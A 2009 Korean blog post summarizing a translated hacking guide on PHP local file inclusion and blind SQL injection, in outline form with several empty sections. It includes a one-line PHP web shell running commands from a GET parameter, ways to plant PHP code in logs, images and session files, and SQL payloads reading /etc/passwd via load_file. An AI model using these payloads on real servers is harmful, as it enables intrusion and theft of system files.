2009.10.28 23:23 Web

Wowhacker 의 b0BaNa 님의 번역본 요약
기본적으로 PHP 취약점 이용
ex)require($file);

2.2 - 원격으로 명령어 실행

<? passthru($_GET[cmd]) ?>

2.2.1-아파치 로그로 PHP 코드 삽입

error.log를 이용 [ 경로 필요 ]

2.2.2-프로세스 테이블에 PHP 코드 삽입

/proc/self  마지막으로 사용된 PID 링크

2.2.3-그림으로 PHP 코드 삽입

코드는 그대로 하고 확장자만 바꿔 우회

2.2.4-세션 파일을 이용한 PHP 코드 삽입

<?php
$user=$_GET['user'];
session_register("user");
session_start();
?>

2.2.5-다른 파일들에 PHP 코드 삽입

ex) FTP 로그, webalizer ,PUT Method

2.3 쉘 획득

ex) wget , 리버스 텔넷

2.4 원격으로 파일 첨가하기

allow_url_include 허용되었다면, 직접 쉘 삽입 가능

3. 블라인드 sql injection



3.2 로컬 파일 읽어오기

union select load_file('/etc/passwd');

3.3 brute force 없이 데이터 획득

outfile "/tmp/sql.txt"
union select 1,2,3,load_file('/tmp/sql.txt');


3.4 원격으로 명령어 실행







Posted by LinkC

댓글을 달아 주세요


블로그 이미지
LinkC

태그목록

Tistory Cumulus Flash tag cloud by BLUEnLIVE requires Flash Player 9 or better.

공지사항

Yesterday31
Today9
Total333,198

달력

 « |  » 2019.10
    1 2 3 4 5
6 7 8 9 10 11 12
13 14 15 16 17 18 19
20 21 22 23 24 25 26
27 28 29 30 31    

최근에 받은 트랙백

글 보관함


. .